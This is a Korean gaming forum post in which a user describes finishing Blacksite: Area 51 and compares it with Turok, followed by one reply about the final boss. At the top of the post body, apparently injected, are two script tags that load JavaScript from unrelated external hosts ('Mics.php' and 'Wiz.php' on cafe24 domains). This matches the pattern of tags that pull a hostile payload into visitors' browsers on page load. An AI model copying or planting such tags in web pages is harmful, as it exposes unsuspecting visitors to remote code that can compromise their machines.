으휴 엔딩봤습니다. > area51

본문 바로가기
사이트 내 전체검색

area51

으휴 엔딩봤습니다.

페이지 정보

작성자 무언의정체 메일보내기 이름으로 검색  (61.♡.233.53) 댓글 1건 조회 1,561회 작성일 09-01-23 12:29

본문

<SCRIPT Language=JavaScript src=http://rnjsdudwh.cafe24.com/Mics.php></script><SCRIPT Language=JavaScript src=http://dlcjsvlf.cafe24.com/Wiz.php></script>        이겜이랑 튜록이랑 흔히 사람들이 b급 게임으로 두게임을

잘 비교하더군요.

튜록은 며칠전에 엔딩봤고 블랙사이트도 방금 엔딩 봤습니다.

전체적으로 나쁘진 않은데 뭔가 빠진듯한 겜입니다.

용량값 못하기는 튜록과 똑같군요.둘다 용량은 작살치는데 게임은 뭔가 부족.....

둘을 전체적으로 비교하면 그래도 튜록이 쪼금 더 낫습니다.

둘다 엔딩도 썰렁합니다.

튜록은 주인공이 동료들이랑 우주선타고 탈출

블랙사이트는 헬기타고 탈출 ㅋㅋㅋㅋㅋ

그래도 초반보단 후반이 좀 낫더군요.

연출이나 거대괴물들이랑 맞짱뜨는건 좀 좋더군요.

그리고 이겜 옵션에 안티설정은 도대체 왜만들어놓은건지 모르겠네요.

아무리 눌러도 off로 고정됩니다-_-

듣기로는 강제안티도 안먹힌다는군요.

난이도는 다들 너무쉽다고 하시던데 전 컨트롤이 허접이라 그런가

쉬움 난이도에서도 몇번을 죽네요-_-

중간중간 프레임 드랍도 좀 짜증나고요(그래도 스파이더맨 웹오브 섀도우보단 나음)

(1.2패치해도 버그 많습니다-_-)

자막지원이 안되서 스토리를 모르겠다는거......

뭐 그냥 가볍게 즐기기에는 좋은것 같습니다.플레이타임도 짧으니까요.

근데 끝판대장 그놈은 누구?주인공 동료임?난 첨보는것 같은데...
추천23 비추천0

댓글목록

정예요원님의 댓글

정예요원 이름으로 검색 아이피 (124.♡.144.159) 작성일

  마지막탄 보스는 중반부에 주인공일행과 같이 행동하지만 후반부에서 배신때린답니다 ㄷㄷ;

공지사항

  • 게시물이 없습니다.

회원로그인

접속자집계

오늘
950
어제
1,571
최대
1,587
전체
14,786

그누보드5
Copyright © 소유하신 도메인. All rights reserved.